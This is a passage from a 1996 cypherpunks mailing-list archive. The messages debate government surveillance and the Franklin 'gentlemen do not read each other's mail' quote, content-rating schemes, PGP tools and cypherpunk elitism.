principle, for us human beings to inquire into the affairs of the humans
claiming the authority of Divine Governmental Beings? Are not the actions
of the Fort Meade Beings a matter for their own personal conscience,
absent any immediate, *direct* impact on us that would justify an
appropriate reaction, be it fight, flight, or encryption? Please assume no
funny theological beliefs in the existence of other Non-Divine Beings, or
sympathy therewith. 

Of course, on individual principle, I quite agree with you, which is why I
do not believe I could ever become a cleric or even disciple of any odd
religion. I'd really suck as a soldier, too.

However, of Hobbes, Rousseau, Marx, Motesquieu, and Locke, I find Hobbes
the most logical. People just suck, and ethics aren't enough. Karl Marx 
and Jim Bell talk about the withering away of the government, but what 
they're really talking about looks like a new and more onerous form of 
government to me. There is a need for force, and I much prefer a balance 
of powers to either unified world government or unorganized individual 
force.

Clearly there is room for maneuver as to how to organize the threat and
use of force, and most people, myself included, do not like the current 
alignment of forces. We can choose multilateral disarmament, or 
deterrence. 

Any time you talk about the organized deterrence of "Bad" behavior,
whether it comes from the NSA or the Cypherpunk Cabal, you're talking
about a system of government. 

-rich
 Fucking Statist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Sat, 27 Jan 1996 17:19:51 +0800
To: cypherpunks@toad.com
Subject: re:Gentlemen do not read each other's mail
Message-ID: <199601252343.PAA00884@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 "Gentlemen do not read each other's mail."
                        Ben Franklin

Original quote by Ben Franklin when the British government published
(stolen?) private letters of
John Adams to his wife critical  of Franklyn and other members of the
Continental Congress.

The Britsh hoped to drive a wedge into the congress and especially between
Adams % Franklin.

Franklin was a gentleman.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQgVzmeikzgqLB7pAQGKOQQAr5nJo0L12l1Xd0EXpsExgZcztOkIKCQa
j7Fhll8wx7dczUa5jJy+o4nfV8duk1MylzA386uO+kfNsCH+s5XlFobaeyc3Epk0
pERqFTzhcVf33egCRDlVqKjwa7uuwJXM2no++vwgGjy9hxSaWAIOAPcZf1Yi5mYj
ZzVSTj8CQQ0=
=gf0F
-----END PGP SIGNATURE-----
***Preserve, Protect and Defend the private use of Strong Crypto***
                 * * * PGP for the masses * * * 
Finger mjwohler@netcom.com for Marc Wohler's public key
fingerprint= F1 70 23 13 91 B5 10 63 0F CF 33 AD BE E6 7B B6





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 27 Jan 1996 16:51:38 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601252139.QAA16761@jekyll.piermont.com>
Message-ID: <Pine.SV4.3.91.960125185751.12434A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 25 Jan 1996, Perry E. Metzger wrote:

> I am a funny sort of person. I don't believe that governments should
> be able to do anything that individuals cannot.

   So violent criminals should never be jailed?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 26 Jan 1996 12:11:47 +0800
To: cypherpunks@toad.com
Subject: Re: PGP in Eudora and other mail programs
Message-ID: <v02120d0dad2dc7553f59@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Will wonders ever cease. PGP-in-Eudora-for-Mac....

Cheers,
Bob Hettinga


-----BEGIN PGP SIGNED MESSAGE-----

Sometimes even the gods are wrong... ;-)

>> A few years later, still no PGP-in-Eudora. One would think that this would
>> be a powerful way of distinguishing their product from other mail packages.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQgXKPgyLN8bw6ZVAQGvdwQAoiWetK6FRmvMqRnB1mXG+94zqRNOHz7C
j8u6huNvp13N29ml2JaDcJtW67SvBKqLrkA2/k26eJM98bMpeDJtm8rAlO/zbgKO
zmicy7hQSFbh9U6jxuFgzwSVofxYtvzuVk9I0cqgmp7diNHaUKLaw3x8mK7ItiS9
Hyl1fBWQiX0=
=0/PO
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 27 Jan 1996 17:18:46 +0800
To: tcmay@got.net
Subject: Cypherpunk Elitism
Message-ID: <01I0FSH7GNG4A0UNXY@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


       This message has some components that may be deemed appropriate for
the list, and some that will not; since Dr. May considered it an
appropriate topic, I am following his lead. However, feel free to take it
to private email.

From:          IN%"tcmay@got.net" 18-JAN-1996 08:09:37.98

>(Ironically, I brought up the new book, "The Winner Take All Society,"
at the last Cypherpunks meeting.  No time to discuss it here, but it
confirms my strong belief that we are heading for a economy in which a
shrinking fraction of workers have really valuable things to contribute,
and a growing fraction of the population does not.  I had not recalled
the authors, but Strick had a battery-powered laptop and Metricom
wireless modem, and ran an Alta Vista search from where he was sitting:
ROBERT FRANK & PHILIP COOK, The Winner-Take-All Society, New York: The
Free Press.)
----------------------------
       You might also find Robert Reich's _The Work of Nations_
interesting. He divides jobs up into Routine Producers (factory-line
workers), In-Person Servers (McDonald's clerks), and Symbolic Analysts
(innovative programmers, scientists, etcetera). His analysis does have
some problems. He views the growing lack of Routine Producer jobs in the
US as due to their export to low-wage countries; I would add automation
as another cause. He also makes the error of regarding education as the
primary (or even only) difference between those qualified for various
jobs, completely ignoring IQ's genetic component. His policy suggestions
for taking care of what he (incorrectly) believes is a problem are also
ridiculous.
-----------------------------

From:          IN%"alano@teleport.com" "Alan Olsen" 19-JAN-1996 00:00:39.70

>I have seen a number of posts on "Cypherpunk Elitism".  I have seen more
examples of it here on the list.

I think that this attitude will be more destructive to the list than
noise in the long run.

It has been said that "Cypherpunks write code".  They must do more than
that.  Cypherpunks need to teach.

All the cryptotools in the world are of no use if no one knows how to use
them.  (Or know how to use them correctly.) All of the protocols are of
no use if no one knows how to impliment them correctly or WHY they need
them in the first place.

There are a lot of bogus security methods.  Many of them exist because
people do not know better.  Without someone to instruct them in the ways
of these things, they will continue to go on with bad crypto, not knowing
any better.

Not all of the non-cypherpunks are beyond hope.  Many of them are
teachable.   If we leave them to flounder on their own, cryptography will
be something used only by an elite.  It will be of little or no threat to
the powers that be because only a small amount of people will have the
ability to use it.   The TLAs will have less encrypted trafic to sort
through.  They will have won a big battle, not through force of arms but
force of egos.
----------------------------
       Part of this depends on the size of the "small number of people,"
and on whom those people are. If a hundred people are using the
remailernet, governments can trace messages (and can easily shut the
down). If a million people are using it, governments cannot trace
messages nearly as easily, and there will be more protest if it is shut
down.
       If the people who are needed for a society to function are in that
group, then a government would need to be suicidal to attack them; these
people can also much more easily leave for another country. If those with
the most income to lose via income taxes are those who are using fully
anonymous ecash, then most of the government's unneeded revenue goes
away.
       In other words, while teaching about cryptography is important...
certain people are more worth teaching than others. This fact is
analogous to that certain people will be more competent after college
than others. Such qualities as intellectual ability, income, and position
make some people more worth convincing than others.
       Incidentally, there is a mailing list for the discussion (and
promotion) of intellectual Elitism. Its Draft FAQ (including directions
for signing on) is at http:/ils.unc.edu/~vreer/elitefaq. (The list in
question is unfortunately currently more disorganized than cypherpunks).
More information can also be found at
http://weber.u.washington.edu/~lfletch/elitism.html and
http://ils.unc.edu/~vreer/elitism.html.
       -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 28 Jan 1996 03:49:28 +0800
To: (Recipient list suppressed)
Subject: [LOCAL] pdx-cypherpunks-l Announcement
Message-ID: <2.2.32.19960126031605.00857104@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A mailing list for Cypherpunk issues local to Portland Oregon (and the 
surrounding area) has been created.  It will have meeting notices and other 
topics of interest to local Cypherpunks in the Portland area.

To subscribe send a message to majordomo@teleport.com with:

subscribe pdx-cypherpunks-l

in the body of the message.

Due to problems with spammers to lists on Teleport, the subscribe request 
will feed back an authorization code to verify that it was actually you who 
subscribed to the list.

If you have any problems getting subscribed, please send me mail (or 
owner-pdx-cypherpunks-l@teleport.com) and the problems will get resolved.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQhG4eQCP3v30CeZAQFQZwf/Uxc+NYHNVwsXaH8co6vlN2qgKdt46Ymq
itCZTdzlOHHnU4rcMdsDeUzod3WYsFBH3UD90x+Z+n+3tX8Y0YB0H0j+imJJhJSo
28kscZnoji0CZKevuOxbL8AFWJ3wUiaa88S6sb0+1aa97TKIuBC845p2ctMqkD90
fExZl/DobXH0HxV+O19UpWoekceIBBoWYsFwBF/6SGLmzmyoBpXmc2lpR3CuJfgk
Nk8w3LIAbSmyI2ERxaUMNKffnItoBt9aCBAR+tybTDLj1RgBYkYO54qqDHVwTSOW
/pkqRN0mQWjYZlryvflPYlykpSN2VUR0dqIVoO9z7ME9P/99iTytVQ==
=bAIW
-----END PGP SIGNATURE-----
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
               National Security uber alles!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 27 Jan 1996 16:59:23 +0800
To: hallam@w3.org
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <9601260024.AA02591@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>  It is not merely ethical for one government to
> read another's mail, it is a duty.

You're too smart to really believe this.  Or do you have some way
for a foreign gov't to know that *this* call is about a murder while
*that* call is about a CIA-sponsored hit against Castro?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Sun, 28 Jan 1996 07:57:26 +0800
To: tcmay@got.net
Subject: Re: Bernie S. Sentencing
In-Reply-To: <199601251653.LAA16128@jekyll.piermont.com>
Message-ID: <199601260132.UAA05720@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Adam Shostack writes:
> > 	Before anyone complains of a lack of crypto relevance to this,
> > Bernie S is the guy who brought Clipper phones & actual clipper chips
> > which he convinced Mykrotronix to send him to the HOPE conference in
> > NYC two years ago.
> 
> Okay, but no one said that in the original message, and it still isn't
> clear how relevant this is. If someone like Tim or me were put in jail
> for, say, drunk driving, I'm not sure it would be proper news here.

I just heard that Perry and Tim were picked up last night for public 
intoxication, after a hard night of partying and crypto-brainstorming.

OBCrypto: The arresting officer found in Perry's jacket pocket, a 
matchbook with what looked like mathematical symbols on it.  He didn't 
know what the symbols were, so he turned it over to the DP department.  I 
hear a couple of hours later, two "suits" showed up at the jail, asked to 
see the matchbook, took one look, turned pale, and spirited Perry and Tim 
out the back door of the jail.  The police profess no knowledge of the 
whereabouts of Tim or Perry - they say they never heard of them.  The 
arrest report has also apparantly disappeared.

The last thing one of the "suits" said was something like "they know 
about the hole in RSA we found with the quantum computer" - or that's 
what was reportedly said.  Something like that.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Fri, 26 Jan 1996 12:54:19 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
In-Reply-To: <ad2cff3b0a02100475c5@[205.199.118.202]>
Message-ID: <Pine.3.89.9601251907.B32067-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 25 Jan 1996, Timothy C. May wrote:

> If the League of Usenet Ladies makes this request, I have no problems
> (though I'm almost certain to delete their request and do nothing one way
> or another about it). If the Islamic Students Association makes the same
> request, I also have no problems (and will also likely discard the
> request). These are non-governmental entities, merely requesting actions
> (and, of course, gettting about 2% compliance, or less,  with their
> requests).
Actually there's a pgp-based program that lets them do that with usenet 
posts. It is called NoCem ("No See 'Em") and is currently used to let users
avoid spam. With spam (or crud of your choice) being defined by those 
posters to alt.nocem.misc whom you trust the most. You can let canceller 
of your choice (anyone with pgp) censor your personal newsfeed.

Unfortunately, like all things unix or command line, it is not a 
no-brainer for Joe Sixpack (I couldn't manage to run it on this unix 
system, for example.) Of course any windows or mac hack could do the 
same trick. Try <http://www.cm.org> 

Bryce's proposal from last week for a cypherpunks-message cancellation 
list is similar. (Sorry, Bryce, I'd help out if I had the time.)

> (Note of course that the League of Usenet Ladies and the Islamic Students
> Association are very likely to have very different ideas about what the
> labels should reflect! Not to mention the several hundred other major
> special interest groups who will want their ideologies reflected in a
> ratings system.)

And the above system would let them do it. One could also personally 
assign a "weight" to each rater and have messages cancelled once a 
threshold was passed (this proposed in the faq, since I couldn't run it, I 
don't know if it currently does it).
  
Who says pgp's web of trust is obsolete? This is an actual application.
Grassroots tech wins again. (Of course this is just a souped-up 
killfile prog masquerading as a newserver, really. Simple solution.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 28 Jan 1996 03:35:25 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: "This post is G-Rated"
Message-ID: <199601260353.TAA07900@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  5:33 PM 1/25/96 -0600, Mike McNally wrote:
>Bill Frantz writes:
> > However is should be possible for TV programs
>
>Maybe, until it becomes common for "TV programs" to be accessible by
>URL...

Web sites and TV series can both be rated without seeing each and every
page/show.


>
> > and whole newsgroups.
>
>Since nobody "owns" newsgroups, and nobody controls what's posted to
>them, I don't see how that's possible at all.

It seems to me that a moderated news group or mailing list would be easy. 
You don't expect explicit sex descriptions to show up in the comp.
hieararcy.  

An unmoderated group or list carries a higher risk of seeing inappropriate
material.  However even unmoderated lists have standards and those people
who enforce those standards.  This kind of enforcement is an example of
communitarian as opposed to authoritarian control.  It all depends on just
how vital it is to the consumer (and rating group) that NO inappropriate
material appear.

Crypto relevence: Public key systems or digital signitures can help ensure
that the material actually comes from it reputed source (e.g. the
modarator).

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 26 Jan 1996 14:58:58 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <199601260353.TAA07910@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:08 PM 1/25/96 -0500, hallam@w3.org wrote:
>>Why is he our patron saint? He was a government official coming out
>>against invasion of privacy. Isn't that what we are all after, in the
>>end?
>
>There is a considerable difference between running a government and being an 
>individual. It is not merely ethical for one government to read another's
>mail, 
>it is a duty.

I am not sure that I believe this line of reasoning my self, but here goes:

The US government is "owned" by its citizens.  Therefore US citizens should
have a high degree of protection from their government.  However, non-US
citizens do not enjoy this same high standard (not being "owners").  They
perhaps should enjoy a similar standard in relation to their own
governments.

Another way of putting it is that while gentlemen do not read each other's
mail, gentlemen read non-gentlemen's mail.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Fri, 26 Jan 1996 14:59:26 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
In-Reply-To: <Pine.SOL.3.91.960125154936.1505F-100000@chivalry>
Message-ID: <Pine.LNX.3.91.960125192736.177A-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 25 Jan 1996, Simon Spero wrote:

> THere are several schemes being put about that work along those lines,
> with message formats being standardised, but not the actual values - you
> should then pick your favourite rating agency, and they determine what is
> rated and how.  This system creates a new market for rating agencies, and
> it also helps parents to determine more precisely what *they* think is fit
> for their children. 

This would allow to emerge a free market 'ecology' of ratings agencies, 
similar to the system that has emerged in the PC technology 
market for product reviews.  

Presently, I obtain a great deal of market exposure by promoting my 
product (I'm a marketing geek at a Silicon Valley networking vendor) in  
competitive reviews done by both specialist companies (e.g., LANQuest Labs) 
and print magazines (PC World,  Communications Week, etc.)

Everyone has their own opinions about the accuracy, testing methodology, 
review philosophy, and veracity of these 'ratings agencies', and there is a 
large market segment that does buy product on little more than what they read 
in these trade rags.

The analogy with Web pages is fairly direct.  As a Web content provider, 
I would be incentivized to have my pages reviewed by those agencies whom 
I felt attracted the right target audience for my content, and whose 
reputation in that audience was good.

As a Web surfer, or parent, or whomever, I could choose (or not) to 
consult with a ratings agency whose criteria and reputation I trust.

As a ratings agency, my reputation would be based on how closely I follow 
the criteria I publish for my rating service.

I can forsee the development of competing 'ratings servers', which 
contain a database of reviewed URL's.  My browser would query one with a 
URL (for a small fee) prior to retrieving the actual page.

With an evolved form of e-cash, this could become a profitable 
business.  Ratings aren't necessarily strictly value judgements; they can 
act as a classification system as well. 

Of course, this is an entirely free market, voluntary, no coercion 
involved, non-legislated solution, so I wouldn't expect it to fly in today's 
political climate.

--
Johnathan M. Corgan
jcorgan@aeinet.com
http://www.aeinet.com/jcorgan.htm








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Jan 1996 15:32:14 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <m0tffca-00090pC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:08 PM 1/25/96 -0500, hallam@w3.org wrote:
>
>>Why is he our patron saint? He was a government official coming out
>>against invasion of privacy. Isn't that what we are all after, in the
>>end?
>
>There is a considerable difference between running a government and being an 
>individual. It is not merely ethical for one government to read another's 
mail, 
>it is a duty.
>
>By not taking adequate steps to inform itself of the Japaneese intentions 
the US 
>suffered the loss of a substantial part of the US fleet at Pearl Harbour. Had 
>sufficient resources been avaliable the naval codes could have been cracked 
in 
>time.  The closure of the Black chamber was a key reason why US espionage 
>efforts were inadequate at the start of WWII.

While this may be based on the "classic" view of the start of the direct 
involvement in WWII, I agree with the opinion of an old college professor 
that the US KNEW that the Japanese were going to attack, SOMEWHERE and 
SOMEWHEN (but not exactly), and in fact WANTED the attack to occur to 
justify getting into a war that we "should" have entered.  And  in 
hindsight, I do not necessarily disagree with such a goal, within the 
limited context of the circumstances at the time.  An extention of this 
interpretation is that much of the fleet was kept at Pearl to "lure" the 
Japanese into doing an attack that could be used to rally the public.  (they 
needed to have enough "bait" to justify an attack.)

Obviously, if that was the intention, then the big surprise was how 
EFFECTIVE the attack was going to be:  Far from just "rallying the public" 
it smashed our defenses.

The reason I mention this interpretation is that it entirely turns around 
your argument:  Our criticism should not be how little we knew of Japanese 
intentions, but how we incompetently delayed entering a war that "needed to 
be fought."

Naturally, however, considering the results of the attack, it would have 
been totally unthinkable to reveal to the public that the bigshots had 
actually DESIRED the attack; a far less incriminating version of the story 
is that some other people were merely negligent.

Now, I was born in 1958 and thus can't claim personal knowledge of the time, 
but it's truly amazing how UNPERCEPTIVE the public must have been in the 
late 40's and early '50s about "intelligence" realities.  Let me give you a 
specific example:  The classic movie, "The Man who Never Was," relates the 
(true) story of a counter-intelligence mission done by the British to (I 
think) mislead the Germans into believing that the attack on Sicily would be 
substantially LATER than it actually was.  The British took a man who had 
died of some natural disease (with the permission of his family, of course), 
dressed him up as if he were a courier and dumped his body (carried by 
submarine) off the coast of (then Fascist) Spain.  With the body were 
(sealed) phony documents that described the FALSE date.  (The idea was, the 
Germans would think that he was on an airplane that had crashed into the 
ocean...) ( He was given a false name, false address, and basically a false 
identity to complete the ruse.)

 By design, he was dumped at a point where ocean currents washed him ashore, 
where he was identified by papers.  Naturally, the British were notified by 
Spain, and the British played along and INSISTED that none of the documents 
with the 
body be unsealed and given to the Germans.  Naturally, however, the Spanish 
cooperated with the Germans, and allowed them to (secretly) unseal the 
documents undetectably.  However, the documents (still apparently sealed and 
unopened) were returned to the British so that (to the Germans) the British 
wouldn't be aware that their secrets had been compromised.


Follow me so far?


Well, in the movie (whose accuracy I don't know) the Germans didn't totally 
believe that the courier was "real", so they sent an operative (probably by 
parachute airdrop, or whatever) to check out the particulars of the story 
they "learned" from the fake background.   (Naturally, the British knew 
about this)  At that point, the British had to 
plant operatives, and support the phony story on the spot, "verifying" the 
information.  At that point, the German agent was able to transmit news that 
"the information is real!" to the Germans.


Now, here was was (to me!) the "funny" part of the movie: 

 The British let the German agent leave Britain.  This sounds logical, 
right?  Because if they were to PICK HIM UP as a spy, that would have 
alerted the Germans that his identity and mission were already known, which 
would only have been true if the story given the Germans initially had been 
a FAKE!

Yet, in the movie,  it was necessary to "explain" to the  (early 1950's) 
audience why they "let that German agent leave Britain"!!  I was laughing, 
practically falling off the edge of my seat, as I was watching that scene!

Clearly, ordinary people of that era weren't very perceptive about such 
things.  Had they (Americans) been told that, "We had to get into WWII to 
save the free world, so we let the Japanese sink half our Pacific fleet!" 
the public WOULD NOT have understood.

This is why I tend to believe that professor's interpretation:  While the 
exact time and location of the attack was not known, IT REALLY DIDN'T MATTER 
because they WANTED it to happen.  The "we couldn't decrypt their traffic in
time" 
(even if it was really true) was merely a convenient cover story for the 
truth. 














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 26 Jan 1996 14:51:56 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <Pine.ULT.3.91.960125140104.9352S-100000@Networking.Stanford.EDU>
Message-ID: <199601260125.UAA16923@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Graves writes:
> Relying on gentlemanliness to protect privacy is a fallacy.

Of course. The reason we study cryptography is because we can't trust
that people will behave like "gentlemen". However, is not the goal
here to assure that communications can be untappable and privacy
assured to all that wish to have privacy?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Fri, 26 Jan 1996 13:16:43 +0800
To: fstuart@vetmed.auburn.edu (Frank Stuart)
Subject: Re: another thought about random numbers
In-Reply-To: <199601252156.PAA17976@snoopy.vetmed.auburn.edu>
Message-ID: <96Jan25.202843edt.10879@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Assuming I didn't dream the whole thing, it seems like it wasn't in Nevada...
> possibly on an Indian reservation?  I think it happened 6 months to a year
> ago.  I'm sorry I can't be more specific.

My recollection was Quebec, Canada.  There were articles posted to the
list at the time, so it should be in the archives if anyone cares enough
to look it up.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 26 Jan 1996 14:00:22 +0800
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: TOP_tap
In-Reply-To: <Pine.SOL.3.91.960125140223.1505B-100000@chivalry>
Message-ID: <199601260130.UAA01330@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> I kinda feel sorry for the NSA staffers sometimes - they're basically a 
> bunch of computer geeks and math whizs who don't get to wear jeans and 
> T-shirts

This *is* a real problem. They take very highly skilled geniuses and
tell them "no one will ever know what you've done.." & their morale does
suffer...

Just suppose YOU discovered (say) a new factoring method... and
could only watch others getting Nobel prizes.....


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 26 Jan 1996 15:11:12 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <Pine.SV4.3.91.960125185751.12434A-100000@larry.infi.net>
Message-ID: <199601260131.UAA16940@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Horowitz writes:
> On Thu, 25 Jan 1996, Perry E. Metzger wrote:
> > I am a funny sort of person. I don't believe that governments should
> > be able to do anything that individuals cannot.
> 
>    So violent criminals should never be jailed?

I didn't say that.

Feel free to draw obvious conclusions about my political beliefs,
however, this isn't politicotheorypunks, so it probably isn't the
right place to discuss this in detail.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 26 Jan 1996 15:28:17 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
In-Reply-To: <ad2d64060f0210042426@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.960125202700.13398O-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Timothy C. May wrote:

> At 11:33 PM 1/25/96, Mike McNally wrote:
> >Bill Frantz writes:
> 
> > > and whole newsgroups.
> >
> >Since nobody "owns" newsgroups, and nobody controls what's posted to
> >them, I don't see how that's possible at all.
> 
> I agree. When I was replying to Bill Frantz's points, I neglected to
> comment on this point.
> 
> Suppose "alt.fan.barney" is rated G, by "someone." Since I can post stuff
> with strong language, and worse, to alt.fan.barney, is it still rated G, or
> was my stuff blocked?
> 
> When the Germans told MeinKampfuServe to block 200+ newsgroups (well, it's
> clear that some BavarianKops showed MKS a list of groups that they thought
> needed to be pulled, and MKS obliged them), a bunch of folks started
> copying soc.culture.german on some highly explicit stuff normally found in
> alt.sex.*. No word yet on whether soc.culture.german is now banned in
> Germany.

That's funny as hell, and probably justified in this case, but I find it 
in poor taste, and I hope it doesn't continue too long after the point 
was made. Has anyone heard of Serdar Argic?

Tim seems to have a selective fascination with the general idea "if a rule
is not enforceable, it's not valid." Applied to crypto, the right to bear 
arms and biological weapons, censorship, etc.

This is a tautology. By definition, rules are made about things that are
not self-enforcing. That's why you make the rule. That's why some people 
like societies.

Some rules are good, some are bad. The non-self-enforcing rule that your
kid shouldn't put a finger in a light socket or cross the street without
looking is probably a good rule. The rule against the export of strong
cryptography is generally, and universally on this list, considered to be
a bad rule. Whether the rule is enforceable is irrelevant.

Nobody can really stop you from posting whatever the hell you want 
wherever you want. The cancelmoose can, according to its own rules and 
ethics, kill your post; Perry, according to his own set of rules, can 
complain; the Bavarian government can *try* to ban you; your ISP can cut 
you off; other ISPs can filter your messages; indviduals can kill-file 
you. None of these actions can *stop* you.

Only jail time or the death penalty would *stop* you.

The reason society holds is that most people have internalized societal
rules as a personal ethic, and show reasonable taste, most of the time.
Unless some buffoon gives us cause to stomp on soc.culture.german as a
symbol (which N.B. affects not just "those Germans," but gads of K-12 and
college students in all countries using it as a medium for cultural
exchange), then we will honor the purpose of the group and their privacy,
just as we'd prefer that total bozos not post irrelevant drivel to
cypherpunks. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Fri, 26 Jan 1996 15:11:44 +0800
To: "'cypherpunks@toad.com>
Subject: RE: RANT: cypherpunks do NSA's job for them!!
Message-ID: <01BAEB65.DC0A5980@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Vladimir Z. Nuri

maybe TCM, who in this case imho is part of the PROBLEM and not part of
the SOLUTION, and an example of how our own behavior is sabotaging our
key goals, will think twice when he writes another *sskissing,
tedious "what the NSA thinks about [x]" post.
.......................................................................................

Maybe he should write something like this?:

it seems to me the problem is when a government begins to insist
that the only authorized encryption you can use must be based on the
secret key they give you is where all the problems arise.

so, what we could advocate as a compromise (given that the post office
is absolutely not going to *not* get in this business, from what I can
tell). we encourage the idea of 

KEY FREEDOM

this would be a heading for the idea that we are in support of the (our)
government creating cryptographic infrastructures and key authentication
services, as long as we always have the total freedom to encrypt 
according to however we please in private communications.

[Date: Thu, 30 Nov 95 15:39:09 -0800
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: key escrow compromise]

   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 26 Jan 1996 15:01:57 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <Pine.ULT.3.91.960125162115.11995F-100000@Networking.Stanford.EDU>
Message-ID: <199601260152.UAA16955@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Graves writes:
> On Thu, 25 Jan 1996, Perry E. Metzger wrote:
> > I am a funny sort of person. I don't believe that governments should
> > be able to do anything that individuals cannot. If it is bad for me to
> > steal, it is also bad for a government official to steal. If it is bad
> > for me to listen in on my neighbor's phone calls, it is bad for the
> > government, too.
> 
> Er, I believe the above was clearly intended to mean "for one government
> to read another government's mail." 

I'm funny in more ways than one. I don't believe in the existence of
"Governments". 

I'm sure that most people seem to believe in this quasi-Divine Being,
of course. A lot of people seem to have constructed temples to some
Holy Being that they refer to as "The Government", made of marble and
steel and glass (often in the manner of temples constructed in ancient
times to Jove or Apollo). There are strange rites associated with the
worship and sustenance of this Divine Entity, such as the ritual
